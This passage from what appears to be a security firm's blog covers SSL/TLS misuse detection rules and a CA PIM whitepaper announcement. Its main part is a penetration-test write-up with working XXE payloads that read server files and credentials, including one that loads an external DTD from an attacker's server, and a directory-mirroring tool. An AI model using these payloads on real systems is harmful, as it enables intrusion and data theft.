  • Often Misused: Custom HostnameVerifier: the rule fires when the code uses the High-Level HttpsURLConnection API and sets a custom HostnameVerifier.

  • Often Misused: Custom SSLSocketFactory: the rule fires when the code uses the High-Level HttpsURLConnection API and sets a custom SSLSocketFactory.

We decided to fire the “often misused” rules because, although the application is using the High-Level API, any overriding of these components should be manually reviewed.

The rules pack is available on GitHub. These checks should always be performed during source code analysis to ensure the code does not introduce insecure SSL/TLS usage.

CA Privileged Identity Manager Security Research Whitepaper

Today we are announcing the release of our latest whitepaper, which includes the results of a research project performed for CA Technologies earlier this year. The focus of the research was to determine the effectiveness of the security controls provided by the CA Privileged Identity Manager (CA PIM) solution against attacks that target privileged identities. Privileged Identity Management is an approach for reducing risk and securing super user accounts. These accounts are required in every IT organization for performing system administration tasks, and the CA PIM solution aims to provide access and account management through a variety of security controls.

The CA PIM components that were considered in scope for the research project were the following:

  • Fine-Grained Access Controls – Layers access controls on top of the native operating system for protecting privileged accounts. In the event a privileged account is compromised, access to the compromised system is restricted.

  • Granular Audit Logging – Provides audit logging for tracking the identity and actions of privileged accounts, even in shared-account scenarios. Combined with enforced fine-grained access controls, this is intended to help with early detection of privileged account compromise.

  • Application Jailing – Provides the ability to enforce fine-grained access controls on applications and processes. By limiting the system resources that can be accessed by an application, those resources are inaccessible to an attacker in the event a vulnerability is exploited, including previously unknown 0-day vulnerabilities.

The research performed included the following major activities:

  • Learning PIM and Initial Setup - The GDS Labs research team started with zero knowledge of the platform and learned about its features and capabilities through setting up common deployment scenarios, reviewing administrator guides, and receiving guidance from CA PIM product support. Additionally, profiling of the relevant agent processes was performed to identify system resources accessed, network communications, etc.

  • Threat and Countermeasure Enumeration - Research activities investigated how CA PIM can be deployed to mitigate common security threat vectors and attacks that target privileged users. The threats and attacks were narrowed to those relevant to the in-scope CA PIM components. Various CA PIM access control policies and configuration settings were identified as potential countermeasures.

  • Solution Mitigation Verification - Selected validation testing was performed to determine the resiliency of configured CA PIM policies against common bypass techniques and exploits relevant to fine-grained access controls. Additionally, CA PIM’s intercepting kernel agent architecture as well as sudo, shell wrapper, and proxy control architectures were compared and evaluated to determine their resiliency to the threats and attacks.

A penetration testing assessment of the product was not performed as part of this phase of the research project. Recommendations for improving the security posture of the product were provided to CA where relevant.

The whitepaper containing the results from our research can be downloaded from our Github page:



Automated Data Exfiltration with XXE

During a recent penetration test, GDS assessed an interesting RESTful web service that led to the development of a tool for automating the exploitation of an XXE (XML External Entity) processing vulnerability to exfiltrate data from the compromised system’s file system. In this post we will look at a sample web service that creates user accounts in order to demonstrate the usefulness of the tool.

The example request below shows four parameters in the body of the HTTP request:

PUT /api/user HTTP/1.1
Content-Type: application/xml
Content-Length: 109


<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<email>[email protected]</email>


The associated HTTP response contains the id of the created account in addition to the parameters supplied in the request:

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 10:57:28 GMT
Content-Type: application/xml
Content-Length: 557
Connection: keep-alive


{
    "userId": 123,
    "firstname": "John",
    "surname": "Doe",
    "email": "[email protected]",
    "role": "admin"
}


Note that the web service accepts both JSON and XML input, which explains why the response is JSON encoded. Supporting multiple data formats is becoming more common, as detailed in a recent blog post by Antti Rantasaari.

A typical proof of concept for XXE is to retrieve the content of /etc/passwd, but with some XML parsers it is also possible to get directory listings. The following request defines the external entity “xxe” to contain the directory listing for “/etc/tomcat7/”:

PUT /api/user HTTP/1.1
Content-Type: application/xml
Content-Length: 233


<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/tomcat7/">
]>
    <email>[email protected]</email>


By referencing “&xxe;” in the surname element we should be able to see the directory listing in the response. Here it is:


HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 11:04:01 GMT
Content-Type: application/xml
Content-Length: 557
Connection: keep-alive


{
    "userId": 126,
    "firstname": "John",
    "surname": "Catalina\ncontext.xml\npolicy.d\nserver.xml\ntomcat-users.xml\nweb.xml\n",
    "email": "[email protected]",
    "role": "admin"
}


The Tool

Now that we can get directory listings and retrieve files, the logical next step is to automate the process and download as many files as possible. The Python script linked below does exactly this. For example, we can mirror the directory “/etc/tomcat7”:

# python /etc/tomcat7/
2015-04-24 16:21:10,650 [INFO    ] retrieving /etc/tomcat7/
2015-04-24 16:21:10,668 [INFO    ] retrieving /etc/tomcat7/Catalina/
2015-04-24 16:21:10,690 [INFO    ] retrieving /etc/tomcat7/Catalina/localhost/
2015-04-24 16:21:10,696 [INFO    ] looks like a file: /etc/tomcat7/Catalina/localhost/
2015-04-24 16:21:10,699 [INFO    ] saving etc/tomcat7/Catalina/localhost
2015-04-24 16:21:10,700 [INFO    ] retrieving /etc/tomcat7/
2015-04-24 16:21:10,711 [INFO    ] looks like a file: /etc/tomcat7/
2015-04-24 16:21:10,714 [INFO    ] saving etc/tomcat7/
2015-04-24 16:21:10,715 [INFO    ] retrieving /etc/tomcat7/context.xml/
2015-04-24 16:21:10,721 [INFO    ] looks like a file: /etc/tomcat7/context.xml/
2015-04-24 16:21:10,721 [INFO    ] saving etc/tomcat7/context.xml


Now we can grep through the mirrored files to look for passwords and other interesting information. For example, the file “/etc/tomcat7/context.xml” may contain database credentials:

<?xml version="1.0" encoding="UTF-8"?>
    <Resource name="jdbc/myDB"


How it works

The XXE payload used in the above request effectively copies the content of the file into the “<surname>” tag. As a result, file content that is not well-formed XML (e.g. a file containing unmatched angle brackets) leads to parsing errors. Moreover, the application might ignore unexpected XML tags.

To overcome these limitations the file content can be encapsulated in a CDATA section (an approach adopted from a presentation by Timothy D. Morgan). With the following request, five entities are declared. The file content is loaded into “%file”, “%start” starts a CDATA section and “%end” closes it. Finally, “%dtd” loads a specially crafted dtd file, which defines the entity “xxe” by concatenating “%start”, “%file” and “%end”. This entity is then referenced in the “<surname>” tag.

PUT /api/user HTTP/1.1
Content-Type: application/xml
Content-Length: 378


<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE updateProfile [
  <!ENTITY % file SYSTEM "file:///etc/tomcat7/context.xml">
  <!ENTITY % start "<![CDATA[">
  <!ENTITY % end "]]>">
  <!ENTITY % dtd SYSTEM "">
  %dtd;
]>
    <email>[email protected]</email>


This is the resource “evil.dtd”, which is loaded from a web server we control:

<!ENTITY xxe "%start;%file;%end;">

The response actually contains the content of the configuration file “/etc/tomcat7/context.xml”.

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 11:12:43 GMT
Content-Type: application/xml
Content-Length: 557
Connection: keep-alive


{
    "userId": 127,
    "firstname": "John",
    "surname": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Context>\n<Resource name=\"jdbc/myDB\" auth=\"Container\" type=\"javax.sql.DataSource\" username=\"sqluser\" password=\"password\" driverClassName=\"com.mysql.jdbc.Driver\" url=\"jdbc:mysql://…\"/>\n</Context>",
    "email": "[email protected]",
    "role": "admin"
}



Note that this technique only works if the server processing the XML input is allowed to make outbound connections to our server to fetch the file “evil.dtd”. Additionally, files containing ‘%’ (and in some cases ‘&’) signs or characters that are not allowed in XML (e.g. most bytes below 0x20) still result in a parsing error. Moreover, the sequence “]]>” causes problems because it terminates the CDATA section.
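The obstacles listed above can be expressed as a simple pre-check. The Java sketch below (names hypothetical) reports whether a given piece of content avoids all of them. It treats ‘&’ as always problematic, even though the post notes it only causes failures in some cases. It also applies the XML 1.0 rule that control characters below 0x20 other than tab, line feed and carriage return are not allowed.

```java
/** Checks content against the limitations of the CDATA exfiltration technique. */
final class CdataTechniqueCheck {
    private CdataTechniqueCheck() {}

    static boolean survivesCdataWrapping(String content) {
        if (content.contains("]]>")) {
            return false; // would terminate the CDATA section early
        }
        for (int i = 0; i < content.length(); i++) {
            char c = content.charAt(i);
            if (c == '%' || c == '&') {
                return false; // conservative: '&' only breaks parsing in some cases
            }
            if (c < 0x20 && c != '\t' && c != '\n' && c != '\r') {
                return false; // control character not allowed in XML 1.0
            }
        }
        return true;
    }
}
```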

In the directory listing, there is no reliable way to distinguish between files and directories. The script assumes that file names contain only alphanumerics, spaces and the characters “$.-_~”, so a response that does not match this pattern is treated as file content. Alternatively, we could treat every file as a directory, iterate over its lines and try to download each line as a possible file or subdirectory. However, this would result in too much overhead when encountering large files.
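A rough Java rendering of this recursion is sketched below. The actual tool is a Python script, and this is not its code. The fetch function is a hypothetical stand-in for one XXE request that returns whatever the parser substituted for a given path (or null on a parsing error), and the name pattern encodes the assumption stated above. As the paragraph warns, a small file whose lines happen to look like file names would be mistaken for a directory.

```java
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.function.Function;
import java.util.regex.Pattern;

/** Sketch of recursively mirroring a directory tree through an XXE primitive. */
final class XxeMirror {
    private XxeMirror() {}

    // Assumed shape of file and directory names: alphanumerics, space and "$.-_~".
    private static final Pattern NAME = Pattern.compile("[A-Za-z0-9 $._~-]+");

    static boolean looksLikeListing(String body) {
        String[] lines = body.split("\n");
        if (body.isEmpty() || lines.length == 0) {
            return false;
        }
        for (String line : lines) {
            if (!NAME.matcher(line).matches()) {
                return false;
            }
        }
        return true;
    }

    /** Returns file contents keyed by path; fetch is a hypothetical XXE round trip. */
    static Map<String, String> mirror(String dir, Function<String, String> fetch) {
        Map<String, String> files = new LinkedHashMap<>();
        walk(dir, fetch, files);
        return files;
    }

    private static void walk(String path, Function<String, String> fetch, Map<String, String> files) {
        String body = fetch.apply(path);
        if (body == null) {
            return; // request failed, e.g. the content broke the XML syntax
        }
        if (!looksLikeListing(body)) {
            // Paths are requested with a trailing slash; strip it when saving a file.
            files.put(path.endsWith("/") ? path.substring(0, path.length() - 1) : path, body);
            return;
        }
        for (String name : body.split("\n")) {
            walk(path + name + "/", fetch, files);
        }
    }
}
```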

The script is tailored to the above example, but by changing the XML template and the “_parse_response()” method it should be fairly easy to adapt it to another target.

The script is available on GitHub:


One way to exploit XXE is to download files from the target server. Some parsers also return directory listings, in which case the presented script can be used to recursively download whole directories. However, there are restrictions on the file content, because certain characters can break the XML syntax.